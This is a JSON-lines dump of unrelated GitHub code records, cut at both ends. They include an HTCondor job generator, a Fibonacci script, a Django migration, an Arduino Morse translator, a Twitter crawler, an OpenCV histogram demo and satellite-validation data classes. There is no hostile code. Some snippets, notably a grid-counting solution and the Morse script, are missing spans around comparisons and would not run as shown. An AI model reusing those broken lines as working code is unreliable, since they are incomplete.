params_it\n\n self._processes: List[_JobClusterGenerator._ProcessInfo] = []\n self._cleanup_handlers: HandlersList = HandlersList()\n self._stack: ExitStack = ExitStack()\n\n @property\n def cleanup_handlers(self) -> HandlersList:\n return self._cleanup_handlers\n\n @property\n def processes(self) -> 'List[_JobClusterGenerator._ProcessInfo]':\n return self._processes\n\n def __enter__(self) -> '_JobClusterGenerator':\n self._stack.__enter__()\n self._stack.enter_context(CallbackOnException(self._cleanup_handlers))\n return self\n\n def __exit__(\n self,\n exc_type: Optional[Type[BaseException]] = None,\n exc_val: Optional[BaseException] = None,\n exc_tb: Optional[TracebackType] = None,\n ) -> Optional[bool]:\n return self._stack.__exit__(exc_type, exc_val, exc_tb)\n\n def __iter__(self) -> Iterator[Dict[str, str]]:\n for params in self._params_it:\n try:\n job = self._job.with_params(params)\n info = _JobClusterGenerator._ProcessInfo(params)\n\n data: Dict[str, str] = {}\n\n if job.transfer_files:\n file_params = self._prepare_all_files_for_transfer(job, data, info)\n else:\n file_params = self._prepare_all_files_for_no_transfer(job, data, info)\n\n job = self._job.with_params(ChainMap(file_params, params))\n\n data.update(\n universe = 'vanilla',\n executable = _lookup_cmd(job.process.cmd),\n arguments = _args_to_str(job.process.args),\n environment = _environment_to_str(job.process.environment),\n leave_in_queue = 'JobStatus != 3',\n )\n\n data.update(job.commands)\n\n except BaseException as e:\n # Ensure that at least one element has been yielded as the\n # htcondor Python bindings seg fault otherwise. See #7609.\n # https://htcondor-wiki.cs.wisc.edu/index.cgi/tktview?tn=7609\n yield {'executable': '/bin/ls'}\n raise e\n\n self._processes.append(info)\n\n print(data)\n\n yield data\n\n def _prepare_all_files_for_transfer(\n self,\n job: Job.WithParams,\n data: Dict[str, str],\n info: '_JobClusterGenerator._ProcessInfo',\n ) -> Dict[str, str]:\n self._prepare_std_files(job, data, info)\n\n info.input_files = [\n self._prepare_input_file_for_transfer(spec) for spec in job.process.input_files\n ]\n\n info.output_files = [\n self._prepare_output_file_for_transfer(spec) for spec in job.process.output_files\n ]\n\n data.update(\n should_transfer_files = 'YES',\n transfer_executable = 'True',\n transfer_input = 'True',\n transfer_output = 'True',\n transfer_error = 'True',\n transfer_input_files = _files_to_str(\n _path_to_str(file.process_path) for file in info.input_files\n ),\n transfer_output_files = _files_to_str(\n _path_to_str(os.path.basename(file.process_path)) for file in info.output_files\n ),\n transfer_output_remaps = _file_remaps_to_str({\n _path_to_str(os.path.basename(file.process_path)): _path_to_str(file.open_path)\n for file in info.output_files\n }),\n when_to_transfer_output = 'ON_EXIT',\n )\n\n all_file_descriptors = itertools.chain(info.input_files, info.output_files)\n return {\n f'__file_{file.name}': _path_to_str(os.path.basename(file.process_path))\n for file in all_file_descriptors\n }\n\n def _prepare_all_files_for_no_transfer(\n self,\n job: Job.WithParams,\n data: Dict[str, str],\n info: '_JobClusterGenerator._ProcessInfo',\n ) -> Dict[str, str]:\n self._prepare_std_files(job, data, info)\n\n temp_dir = self._htcondor._temp_dir\n\n info.input_files = [\n prepare_input_file(spec, self._stack, self._cleanup_handlers, temp_dir=temp_dir)\n for spec in job.process.input_files\n ]\n\n info.output_files = [\n prepare_output_file(spec, self._stack, self._cleanup_handlers, temp_dir=temp_dir)\n for spec in job.process.output_files\n ]\n\n data.update(\n should_transfer_files = 'NO',\n transfer_executable = 'False',\n transfer_input = 'False',\n transfer_output = 'False',\n transfer_error = 'False',\n )\n\n all_file_descriptors = itertools.chain(info.input_files, info.output_files)\n return {\n f'__file_{file.name}': _path_to_str(file.process_path) for file in all_file_descriptors\n }\n\n def _prepare_std_files(\n self,\n job: Job.WithParams,\n data: Dict[str, str],\n info: '_JobClusterGenerator._ProcessInfo',\n ) -> None:\n temp_dir = self._htcondor._temp_dir\n if job.process.stdin.connected:\n info.stdin = stdin = prepare_input_file(\n job.process.stdin, self._stack, self._cleanup_handlers, name='stdin',\n temp_dir=temp_dir,\n )\n data['input'] = _path_to_str(info.stdin.open_path)\n if job.process.stdout.capture:\n info.stdout = prepare_output_file(\n job.process.stdout, self._stack, self._cleanup_handlers, name='stdout',\n temp_dir=temp_dir,\n )\n data['output'] = _path_to_str(info.stdout.open_path)\n if job.process.stderr.capture:\n info.stderr = prepare_output_file(\n job.process.stderr, self._stack, self._cleanup_handlers, name='stderr',\n temp_dir=temp_dir,\n )\n data['error'] = _path_to_str(info.stderr.open_path)\n if job.log.capture:\n info.log = prepare_output_file(\n job.log, self._stack, self._cleanup_handlers, name='log',\n temp_dir=temp_dir,\n )\n data['log'] = _path_to_str(info.log.open_path)\n\n def _prepare_input_file_for_transfer(self, spec: Process.InputFile) -> FileDescriptor:\n temp_dir = self._htcondor._temp_dir\n desc = prepare_input_file(spec, self._stack, self._cleanup_handlers, temp_dir=temp_dir)\n if not desc.temporary:\n if isinstance(desc.open_path, str):\n link_path = _make_temp_link(desc.open_path, temp_dir)\n elif isinstance(desc.open_path, bytes):\n link_path = _make_temp_link(_path_to_str(desc.open_path), temp_dir)\n self._stack.callback(os.unlink, link_path)\n desc = replace(desc, process_path=link_path)\n return desc\n\n def _prepare_output_file_for_transfer(self, spec: Process.OutputFile) -> FileDescriptor:\n temp_dir = self._htcondor._temp_dir\n desc = prepare_output_file(spec, self._stack, self._cleanup_handlers, temp_dir=temp_dir)\n if not desc.temporary:\n fd, file_path = mkstemp(dir=temp_dir)\n os.close(fd)\n self._stack.callback(os.unlink, file_path)\n desc = replace(desc, process_path=file_path)\n return desc\n\n\ndef _lookup_cmd(cmd: str) -> str:\n cmd_path = cmd if os.path.isabs(cmd) else which(cmd)\n if cmd_path is None:\n raise Exception(f'Failed to locate (\"which\") command {cmd!r}')\n return cmd_path\n\ndef _rand_name_it(length: int=8) -> Iterator[str]:\n c = 'abcdefghijklmnopqrstuvwxyz0123456789_'\n random = Random()\n\n return (''.join(random.choice(c) for _ in range(length)) for _ in itertools.repeat(None))\n\ndef _make_temp_link(\n orig: AnyStr,\n dir: AnyStr,\n prefix: Optional[AnyStr] = None,\n suffix: Optional[AnyStr] = None,\n) -> AnyStr:\n \"\"\"Creates a symlink using a mechanism suitable for a temporary directory.\n\n The function behaves safely in concurrent scenarios: The ``symlink``\n syscall atomically creates a symlink or fails. Many random names are tried\n before raising an exception if an existing files with the randomised name\n is discovered.\n\n Adapted from the Python standard library, dropped Windows special case.\n https://github.com/python/cpython/blob/e65b3fa9f16537d20f5f37c25673ac899fcd7099/Lib/tempfile.py#L247\n\n Args:\n orig: Path which the symlink should point to.\n dir: Directory in which the symlink should be created.\n prefix: Prefix before the random part of the symlink.\n suffix: Suffix after the random part of the symlink.\n \"\"\"\n\n names: Iterator[AnyStr]\n pre: AnyStr\n suf: AnyStr\n if isinstance(orig, bytes):\n names = map(os.fsencode, _rand_name_it())\n pre = prefix if prefix is not None else os.fsencode('')\n suf = suffix if suffix is not None else os.fsencode('')\n else:\n names = _rand_name_it()\n pre = prefix if prefix is not None else ''\n suf = suffix if suffix is not None else ''\n\n files = map(lambda n: os.path.join(dir, pre + n + suf), names)\n\n for file, _ in zip(files, range(TMP_MAX)):\n try:\n os.symlink(orig, file)\n except FileExistsError:\n continue\n\n return os.path.abspath(file)\n\n raise FileExistsError(errno.EEXIST, 'No usable temporary file name found')\n","repo_name":"pskopnik/bjec","sub_path":"src/bjec/htcondor.py","file_name":"htcondor.py","file_ext":"py","file_size_in_byte":39976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"46762807284","text":"def fibonacci(n):\n if n == 0: # return 0 as it is\n return 0\n elif n == 1: # return 1 as it is\n return 1\n else:\n return fibonacci(n-1) + fibonacci(n-2) # Calculate and return the nth number in the Fibonacci sequence\n\nn = int(input(\"Enter a number: \"))\nfor i in range(n):\n print(fibonacci(i), end=' ')\nprint()\n","repo_name":"AlmightyNan/math","sub_path":"fibonacci sequences/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"21564084254","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Answer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('answer', models.TextField(verbose_name='answer')),\n ('date_answered', models.DateTimeField(verbose_name='date answered')),\n ],\n ),\n migrations.CreateModel(\n name='Question',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('question', models.TextField(verbose_name='question')),\n ('date_posted', models.DateTimeField(verbose_name='date posted')),\n ],\n ),\n migrations.AddField(\n model_name='answer',\n name='question',\n field=models.ForeignKey(to='quorahome.Question'),\n ),\n ]\n","repo_name":"Luciekimotho/Quora","sub_path":"quorahome/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"98129130","text":"import sys\nimport bisect\nr=sys.stdin.readline\nN=int(r())\nk=int(r())\nans=0\ndef solution(num,N):\n if num==1:\n return 1\n elif num==N**2:\n return N**2\n else:\n LR=[1,N]\n cnt=0\n for i in range(1,N+1):\n L,R=LR[0]*i,LR[1]*i\n if num3 and mid%3!=0:\n while mid%3!=0:\n mid+=1\n tmp=solution(mid,N)\n if tmp==k or hi==mid or lo==mid:\n break\n elif k 50 :\n cw_string += \"/\"\n elif int(beep) == 0 and len(beep) > 12 :\n cw_string += \" \"\n elif int(beep) != 0 and len(beep) > 20 :\n cw_string += \"END\"\n elif int(beep) != 0 and len(beep) > 5 :\n cw_string += '-'\n elif int(beep) !=0 and len(beep) > 1 :\n cw_string += '.'\n\nprint('CW string generated: ', cw_string)\n\ntranslated_words = CW_translate(cw_string)\ntranslation = \"\"\n\nfor word in translated_words:\n translation += word\n translation += ' '\n \nprint('translation: ', translation.capitalize())\n\n# Close serial port\nser.close()\n","repo_name":"yrsci/morse-arduino","sub_path":"python_morse_translator.py","file_name":"python_morse_translator.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20307959349","text":"import json\nimport os\nimport sys\nfrom twarc import Twarc\nfrom constants import *\n\ndef newTweet():\n tweet = {\n \"id\": \"\",\n \"favorite_count\": \"\",\n \"full_text\": \"\",\n \"is_quote_status\": \"\",\n \"is_retweet\": \"\",\n \"quoted_status_id\": \"\",\n \"retweet_count\": \"\",\n \"retweeted_status_id\": \"\",\n \"user_id\": \"\",\n \"lang\": \"\",\n \"created_at\": \"\",\n }\n return tweet\n\n\nif __name__ == '__main__':\n if not os.path.exists(DATA_DIR):\n os.makedirs(DATA_DIR)\n with open(TWEET_DATAFILE, \"w\") as f:\n json.dump([], f)\n tweets = []\n users = set()\n count = 0\n for tweet in twarc.search(\"trump\", max_id=928149460303020032):\n count += 1\n tw = newTweet()\n for attr in tw:\n tw[attr] = tweet.get(attr)\n tw[\"user_id\"] = tweet[\"user\"][\"id\"]\n users.add(tweet[\"user\"][\"id\"])\n if tweet.get(\"retweeted_status\"):\n tw[\"is_retweet\"] = True\n tw[\"retweeted_status_id\"] = tweet[\"retweeted_status\"][\"id\"]\n tw[\"retweet_count\"] = 0\n tweets.append(tw)\n if count%(max(10, TWEETS_TO_CRAWL/1000)) == 0:\n with open(TWEET_DATAFILE) as f:\n data = json.load(f);\n data += tweets\n tweets = []\n with open(TWEET_DATAFILE, 'w') as f:\n json.dump(data, f, indent=2)\n sys.stdout.write('\\r')\n sys.stdout.write('{} tweets searched'.format(count))\n sys.stdout.flush()\n if count == TWEETS_TO_CRAWL:\n break\n","repo_name":"maulik96/IR-twitter-user-authenticity","sub_path":"src/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"32278800880","text":"my_dict = {\r\n \"1\": \"one\",\r\n \"2\": \"two\",\r\n \"3\": \"three\",\r\n \"4\": \"four\",\r\n \"5\": \"five\",\r\n \"6\": \"six\",\r\n \"7\": \"seven\",\r\n \"8\": \"eight\",\r\n \"9\": \"nine\",\r\n \"10\": \"ten\",\r\n \"11\": \"eleven\",\r\n \"12\": \"twelve\",\r\n \"13\": \"thirteen\",\r\n \"14\": \"fourteen\",\r\n \"15\": \"fifteen\",\r\n \"16\": \"sixteen\",\r\n \"17\": \"seventeen\",\r\n \"18\": \"eighteen\",\r\n \"19\": \"nineteen\",\r\n \"20\": \"twenty\",\r\n \"30\": \"thirty\",\r\n \"40\": \"forty\",\r\n \"50\": \"fifty\",\r\n \"60\": \"sixty\",\r\n \"70\": \"seventy\",\r\n \"80\": \"eighty\",\r\n \"90\": \"ninety\"\r\n}\r\n# Cach doc tung so\r\ndef translate(n):\r\n result = \"\"\r\n if n != 0:\r\n a = n//100\r\n n = n - a*100\r\n c = n % 10\r\n b = n - c\r\n if a != 0:\r\n a = str(a)\r\n result += my_dict[a] + \"hundred\"\r\n if b > 10:\r\n result += \"and\"\r\n b = str(b)\r\n result += my_dict[b]\r\n if c != 0:\r\n c = str(c)\r\n result += my_dict[c]\r\n elif b == 0:\r\n if c != 0:\r\n result += \"and\"\r\n c = str(c)\r\n result += my_dict[c]\r\n else:\r\n result += \"and\"\r\n if c == 0 :\r\n result += \"ten\"\r\n else:\r\n d = str(b+c)\r\n result += my_dict[d]\r\n return len(result)\r\n\r\ntotal = 0\r\nfor i in range(1,1000):\r\n total += translate(i)\r\ntotal += 11 - 3*99\r\nprint (total)","repo_name":"pratyaydeep/Python-programs","sub_path":"ProjectEuler/Problem17_ProjectEuler.py","file_name":"Problem17_ProjectEuler.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41139975521","text":"#!/usr/bin/python3\n# part of https://github.com/WolfgangFahl/play-chess-with-a-webcam\n\n'''\nCreated on 2019-11-29\n\n@author: wf\n\nsee https://docs.opencv.org/master/d1/db7/tutorial_py_histogram_begins.html\n'''\nimport sys\nimport cv2\nfrom matplotlib import pyplot as plt\nfrom timeit import default_timer as timer\n\nclass Histogram:\n \"\"\" Image Histogram \"\"\"\n color = ('blue','green','red')\n \n def __init__(self,image):\n self.hist={}\n self.image=image\n self.rgb=cv2.cvtColor(self.image, cv2.COLOR_BGR2RGB)\n \n start=timer()\n for i in range(len(Histogram.color)):\n self.hist[i] = cv2.calcHist([image],[i],None,[256],[0,256])\n end=timer()\n self.time=end-start\n \n def plot(self): \n fig,(ax1,ax2)=plt.subplots(1,2)\n fig.suptitle('color histogram', fontsize=20)\n ax1.imshow(self.rgb), ax1.axis('off')\n for i,col in enumerate(Histogram.color):\n ax2.plot(self.hist[i],color = col)\n #ax2.xlim([0,256])\n plt.show()\n\ndef main(argv):\n default_file = '../../testMedia/chessBoard013.jpg'\n filename = argv[0] if len(argv) > 0 else default_file\n image = cv2.imread(filename)\n #cv2.imshow('chessboard', image)\n # refresh\n #cv2.waitKey(10)\n h=Histogram(image)\n h.plot()\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])","repo_name":"WolfgangFahl/play-chess-with-a-webcam","sub_path":"examples/opencv/histogram2.py","file_name":"histogram2.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"27"} +{"seq_id":"13740012309","text":"import numpy as np\nimport h5py\nfrom atrain_match.utils.common import write_match_objects\n\n\nclass DataObject(object):\n \"\"\"\n Class to handle data objects with several arrays.\n\n \"\"\"\n\n def __getattr__(self, name):\n try:\n return self.all_arrays[name]\n except KeyError:\n raise AttributeError(\"%s instance has no attribute '%s'\" % (\n self.__class__.__name__, name))\n\n def __setattr__(self, name, value):\n if name == 'all_arrays':\n object.__setattr__(self, name, value)\n else:\n self.all_arrays[name] = value\n\n def __add__(self, other):\n \"\"\"Adding two objects together\"\"\"\n # Check if we have an empty object\n # modis objects does not have longitude attribute\n is_empty_self = True\n is_empty_other = True\n for key in self.all_arrays.keys():\n if self.all_arrays[key] is not None and len(self.all_arrays[key]) > 0:\n is_empty_self = False\n for key in other.all_arrays.keys():\n if other.all_arrays[key] is not None and len(other.all_arrays[key]) > 0:\n is_empty_other = False\n if is_empty_self:\n # print(\"First object is None!, returning second object\")\n return other\n if is_empty_other:\n # print(\"Second object is None!, returning first object\")\n return self\n for key in self.all_arrays:\n try:\n if self.all_arrays[key].ndim != self.all_arrays[key].ndim:\n raise ValueError(\"Can't concatenate arrays \" +\n \"of different dimensions!\")\n except AttributeError:\n # print \"Don't concatenate member \" + key + \"... \" + str(e)\n self.all_arrays[key] = other.all_arrays[key]\n continue\n try:\n if self.all_arrays[key].ndim == 1:\n self.all_arrays[key] = np.concatenate(\n [self.all_arrays[key],\n other.all_arrays[key]])\n elif key in ['segment_nwp_geoheight',\n 'segment_nwp_moist',\n 'segment_nwp_pressure',\n 'segment_nwp_temp']:\n self.all_arrays[key] = np.concatenate(\n [self.all_arrays[key],\n other.all_arrays[key]], 0)\n elif self.all_arrays[key].ndim == 2:\n self.all_arrays[key] = np.concatenate(\n [self.all_arrays[key],\n other.all_arrays[key]], 0)\n except ValueError:\n # print \"Don't concatenate member \" + key + \"... \" + str(e)\n self.all_arrays[key] = other.all_arrays[key]\n return self\n\n def extract_elements(self, idx=None, starti=0, endi=0):\n \"\"\"Extract elements with index idx\"\"\"\n # to replace calipso_track_from_matched\n\n for key, value in self.all_arrays.items():\n if key in [\"TAI_start\"]:\n continue\n if value is None:\n self.all_arrays[key] = None\n elif value.size == 1:\n pass\n elif idx is not None:\n self.all_arrays[key] = value[idx.ravel(), ...]\n else:\n self.all_arrays[key] = value[starti:endi, ...]\n if value is not None and len(value.shape) > 1 and value.shape[1] == 1:\n self.all_arrays[key] = self.all_arrays[key].ravel()\n\n return self\n\n def mask_nodata(self, nodata):\n for key in self.all_arrays:\n if key in ['latitude']:\n pass\n else:\n try:\n self.all_arrays[key] = np.ma.array(\n self.all_arrays[key],\n mask=self.all_arrays[key] <= nodata)\n except:\n print(\"cloud not mask %s\" % (key))\n\n\nclass ExtractedImagerObject(DataObject):\n def __init__(self):\n DataObject.__init__(self)\n self.all_arrays = {\n 'imager_ctth_m_above_seasurface': None,\n 'longitude': None,\n 'latitude': None,\n 'sec_1970': None,\n 'ctth_height': None,\n 'ctth_pressure': None,\n 'ctth_temperature': None,\n 'cloudtype': None,\n 'cloudmask': None,\n 'cfc_mean': None,\n 'cma_prob': None,\n 'cma_prob_mean': None,\n 'cpp_iwp': None,\n 'cpp_lwp': None,\n 'cpp_phase': None,\n 'cpp_cer': None,\n # Quality flags\n 'cloudtype_qflag': None,\n 'cloudtype_phaseflag': None,\n 'cloudtype_quality': None,\n 'cloudtype_conditions': None,\n 'cloudtype_status': None,\n 'ctth_status': None,\n # Angles\n 'satz': None,\n 'sunz': None,\n #Uncertainties\n 'cma_unc': None,\n 'cph_unc': None,\n 'cth_unc': None,\n 'ctp_unc': None,\n 'ctt_unc': None,\n 'cwp_unc': None\n }\n\n\nclass ModisObject(DataObject):\n def __init__(self):\n DataObject.__init__(self)\n self.all_arrays = {\n 'height': None,\n 'temperature': None,\n 'pressure': None,\n 'cloud_emissivity': None,\n 'cloud_phase': None,\n 'lwp': None}\n\n\nclass ExtraObject(DataObject):\n def __init__(self):\n DataObject.__init__(self)\n self.all_arrays = {\n 'name': None}\n\n\nclass CalipsoObject(DataObject):\n def __init__(self):\n DataObject.__init__(self)\n self.all_arrays = {\n # Normal name = calipso.name.lower()\n\n # Imager matching needed for all truths:\n 'longitude': None,\n 'latitude': None,\n 'imager_linnum': None,\n 'imager_pixnum': None,\n 'elevation': None, # DEM_elevation => elevation in (m)\"\n 'cloud_fraction': None,\n 'validation_height': None,\n 'sec_1970': None,\n 'minimum_laser_energy_532': None,\n 'layer_top_altitude': None,\n 'layer_top_temperature': None,\n 'layer_top_pressure': None,\n 'midlayer_temperature': None,\n 'layer_base_altitude': None,\n 'layer_base_pressure': None,\n 'number_layers_found': None,\n 'igbp_surface_type': None,\n 'nsidc_surface_type': None, # V4 renamed from 'snow_ice_surface_type'\n 'snow_ice_surface_type': None,\n # 'nsidc_surface_type_texture': None,\n 'profile_time_tai': None, # renamed from \"Profile_Time\"\n 'feature_classification_flags': None,\n 'day_night_flag': None,\n 'feature_optical_depth_532': None,\n 'tropopause_height': None,\n 'profile_id': None,\n 'cad_score': None,\n # If a combination of 5 and 1km data are used for RESOLUTION=1\n # \"column_optical_depth_tropospheric_aerosols_1064_5km\": None,\n # \"column_optical_depth_tropospheric_aerosols_1064\": None,\n \"column_optical_depth_tropospheric_aerosols_532_5km\": None,\n \"column_optical_depth_tropospheric_aerosols_532\": None,\n \"column_optical_depth_aerosols_532_5km\": None,\n \"column_optical_depth_aerosols_532\": None,\n # \"column_optical_depth_tropospheric_aerosols_uncertainty_1064_5km\": None,\n # \"column_optical_depth_tropospheric_aerosols_uncertainty_532_5km\": None,\n \"column_optical_depth_cloud_532_5km\": None,\n # \"column_optical_depth_cloud_uncertainty_532_5km\": None,\n \"feature_optical_depth_532_5km\": None,\n \"layer_top_altitude_5km\": None,\n \"layer_top_pressure_5km\": None,\n \"number_layers_found_5km\": None,\n # Variables derived for 5km data\n # Also included if a combination of 5 and 1km data are used for RESOLUTION=1\n 'detection_height_5km': None,\n 'total_optical_depth_5km': None,\n \"feature_optical_depth_532_top_layer_5km\": None,\n 'cfc_single_shots_1km_from_5km_file': None,\n \"average_cloud_top_pressure_single_shots\": None,\n \"average_cloud_top_pressure_single_shots_5km\": None,\n \"average_cloud_top_single_shots\": None,\n \"average_cloud_top_single_shots_5km\": None,\n \"average_cloud_base_single_shots\": None,\n \"average_cloud_base_single_shots_5km\": None,\n \"single_shot_data\": None,\n # Variables derived from 5km file to 1kmresolution_\n 'cfc_single_shots_1km_from_5km_file': None,\n\n # From cloudsat:\n 'cal_modis_cflag': None,\n 'cloudsat_index': None,\n }\n\n\nclass CloudsatObject(DataObject):\n def __init__(self):\n DataObject.__init__(self)\n self.all_arrays = {\n 'clsat_max_height': None,\n 'longitude': None,\n 'latitude': None,\n 'imager_linnum': None,\n 'imager_pixnum': None,\n 'cloud_fraction': None,\n 'validation_height': None,\n 'validation_height_base': None,\n 'elevation': None,\n 'sec_1970': None,\n 'CPR_Cloud_mask': None,\n 'MODIS_Cloud_Fraction': None,\n 'MODIS_cloud_flag': None,\n 'Height': None,\n 'LO_RVOD_liquid_water_path': None,\n 'IO_RVOD_ice_water_path': None,\n 'LO_RO_liquid_water_path': None,\n 'IO_RO_ice_water_path': None,\n #'liq_water_path': None, # kg!/m2 R05\n #'ice_water_path': None, # kg!/m2 R05\n 'RVOD_liq_water_path': None, # g/m2 R04\n 'RVOD_ice_water_path': None, # g/m2 R04\n 'RO_liq_water_path': None, # g/m2 R05\n 'RO_ice_water_path': None, # g/m2 R05\n 'precip_liq_water_path_gm2': None, # g/m2\n 'cloud_liq_water_path_gm2': None, # g/m2 \n 'precip_ice_water_path_gm2': None, # g/m2 \n 'cloud_ice_water_path_gm2': None, # g/m2\n 'liq_water_path_gm2': None, # g/m2\n 'ice_water_path_gm2': None, # g/m2\n 'precip_liq_water_path': None, # kg/m2 R05\n 'cloud_liq_water_path': None, # kg/m2 R05\n 'precip_ice_water_path': None, # kg/m2 R05\n 'cloud_ice_water_path': None, # kg/m2 R05\n 'liq_water_path': None, # kg/m2 R05\n 'ice_water_path': None, # kg/m2 R05\n #'ice_water_content': None,\n #'liq_water_content': None,\n \"RVOD_CWC_status\": None,\n \"RO_CWC_status\": None,\n 'Phase': None,\n 'Profile_time': None,\n 'TAI_start': None,\n # From calipso\n 'calipso_layer_base_altitude': None,\n 'calipso_layer_top_altitude': None,\n 'calipso_feature_classification_flags': None\n }\n\n\nclass DardarObject(DataObject):\n def __init__(self):\n DataObject.__init__(self)\n self.all_arrays = {\n 'sec_1970': None,\n 'latitude': None,\n 'longitude': None,\n 'imager_linnum': None,\n 'imager_pixnum': None,\n #'height': None,\n #'Z': None,\n 'bscat': None,\n 'bscat_perp': None,\n 'instrument_flag': None,\n 'iwc': None,\n 'Target_Lidar_Mask': None,\n 'effective_radius': None,\n 'N0star': None,\n 'temperature': None,\n 'day_night_flag': None,\n 'land_water_mask': None,\n 'tropopause_height': None,\n 'DARMASK_Simplified_Categorization': None\n }\n\n\nclass IssObject(DataObject):\n def __init__(self):\n DataObject.__init__(self)\n self.all_arrays = {\n # Name: Iss name .lower()\n 'longitude': None,\n 'latitude': None,\n # Derived:\n 'imager_linnum': None,\n 'imager_pixnum': None,\n 'sec_1970': None,\n 'elevation': None,\n 'cloud_fraction': None,\n 'validation_height': None,\n 'total_optical_depth_5km': None,\n # Used\n 'cloud_phase_fore_fov': None,\n 'feature_type_fore_fov': None,\n 'extinction_qc_flag_1064_fore_fov': None,\n 'layer_top_altitude_fore_fov': None,\n 'sky_condition_fore_fov': None,\n }\n\n\nclass AmsrObject(DataObject):\n def __init__(self):\n DataObject.__init__(self)\n self.all_arrays = {\n 'longitude': None,\n 'latitude': None,\n 'imager_linnum': None,\n 'imager_pixnum': None,\n 'imager_linnum_nneigh': None,\n 'imager_pixnum_nneigh': None,\n 'sec_1970': None,\n 'lwp': None,\n 'pixel_status': None,\n 'quality': None,\n 'surface_type': None}\n\n\nclass MoraObject(DataObject):\n def __init__(self):\n DataObject.__init__(self)\n self.all_arrays = {\n 'longitude': None,\n 'latitude': None,\n 'imager_linnum': None,\n 'imager_pixnum': None,\n 'cloud_base_height': None,\n 'sec_1970': None}\n\n\nclass SynopObject(DataObject):\n def __init__(self):\n DataObject.__init__(self)\n self.all_arrays = {\n 'longitude': None,\n 'latitude': None,\n 'imager_linnum': None,\n 'imager_pixnum': None,\n 'imager_linnum_nneigh': None,\n 'imager_pixnum_nneigh': None,\n 'total_cloud_cover': None,\n 'cloud_fraction': None,\n 'nh': None,\n 'cl': None,\n 'cm': None,\n 'ch': None,\n 'vvv': None,\n 'ww': None,\n 'temp': None,\n 'dtemp': None,\n 'sec_1970': None,\n 'pressure': None}\n\n\nclass TruthImagerTrackObject:\n def __init__(self, truth='calipso'):\n self.imager = ExtractedImagerObject()\n self.modis_lvl2 = ModisObject()\n if truth in 'calipso':\n self.calipso = CalipsoObject()\n self.calipso_aerosol = CalipsoObject()\n elif truth in 'cloudsat':\n self.cloudsat = CloudsatObject()\n elif truth in 'amsr':\n self.amsr = AmsrObject()\n elif truth in 'synop':\n self.synop = SynopObject()\n elif truth in 'mora':\n self.mora = MoraObject()\n elif truth in 'iss':\n self.iss = IssObject()\n elif truth in 'dardar':\n self.dardar = DardarObject()\n self.extra = ExtraObject()\n self.diff_sec_1970 = None\n self.truth_sat = truth\n self.imager_instrument = 'imager'\n\n def make_nsidc_surface_type_texture(self, kernel_sz=51):\n \"\"\"Derive the stdv of the ice dataset\"\"\"\n\n if self.calipso.all_arrays['nsidc_surface_type'] is not None:\n self.calipso.all_arrays['nsidc_surface_type_texture'] = sliding_std(\n self.calipso.all_arrays['nsidc_surface_type'], kernel_sz)\n\n def __add__(self, other):\n \"\"\"Concatenating two objects together\"\"\"\n for object_name in ['imager', 'calipso', 'calipso_aerosol', 'amsr', 'dardar',\n 'cloudsat', 'iss', 'mora', 'synop', 'modis_lvl2', 'modis', 'extra']:\n if hasattr(self, object_name):\n setattr(self, object_name,\n getattr(self, object_name) +\n getattr(other, object_name))\n try:\n self.diff_sec_1970 = np.concatenate([self.diff_sec_1970,\n other.diff_sec_1970])\n except ValueError:\n # print \"Don't concatenate member diff_sec_1970... \" + str(e)\n self.diff_sec_1970 = other.diff_sec_1970\n return self\n\n def extract_elements(self, idx=None, starti=None, endi=None):\n for object_name in ['imager', 'calipso', 'calipso_aerosol', 'amsr', 'dardar',\n 'cloudsat', 'iss', 'mora', 'synop', 'modis', 'extra']:\n if hasattr(self, object_name):\n obj = getattr(self, object_name)\n setattr(self, object_name, obj.extract_elements(idx=idx, starti=starti, endi=endi))\n try:\n if idx is not None:\n self.diff_sec_1970 = self.diff_sec_1970[idx]\n else:\n self.diff_sec_1970 = self.diff_sec_1970[starti:endi]\n except ValueError:\n # print \"Don't concatenate member diff_sec_1970... \" + str(e)\n self.diff_sec_1970 = self.diff_sec_1970\n return self\n\n\ndef get_stuff_to_read_from_a_reshaped_file(h5file, retv):\n h5_groups = []\n data_objects = []\n if 'calipso' in h5file.keys():\n h5_groups.append(h5file['/calipso'])\n data_objects.append(retv.calipso)\n if 'calipso_aerosol' in h5file.keys():\n h5_groups.append(h5file['/calipso_aerosol'])\n data_objects.append(retv.calipso_aerosol)\n if 'pps' in h5file.keys():\n h5_groups.append(h5file['/pps'])\n data_objects.append(retv.imager)\n if 'cci' in h5file.keys():\n h5_groups.append(h5file['/cci'])\n data_objects.append(retv.imager)\n if 'seviri_hrit' in h5file.keys():\n h5_groups.append(h5file['/seviri_hrit'])\n data_objects.append(retv.imager)\n if 'maia' in h5file.keys():\n h5_groups.append(h5file['/maia'])\n if 'oca' in h5file.keys():\n h5_groups.append(h5file['/oca'])\n data_objects.append(retv.imager)\n if 'patmosx' in h5file.keys():\n h5_groups.append(h5file['/patmosx'])\n data_objects.append(retv.imager)\n if 'modis_lvl2' in h5file.keys():\n h5_groups.append(h5file['/modis_lvl2'])\n data_objects.append(retv.modis_lvl2)\n if 'cloudsat' in h5file.keys():\n h5_groups.append(h5file['/cloudsat'])\n data_objects.append(retv.cloudsat)\n if 'dardar' in 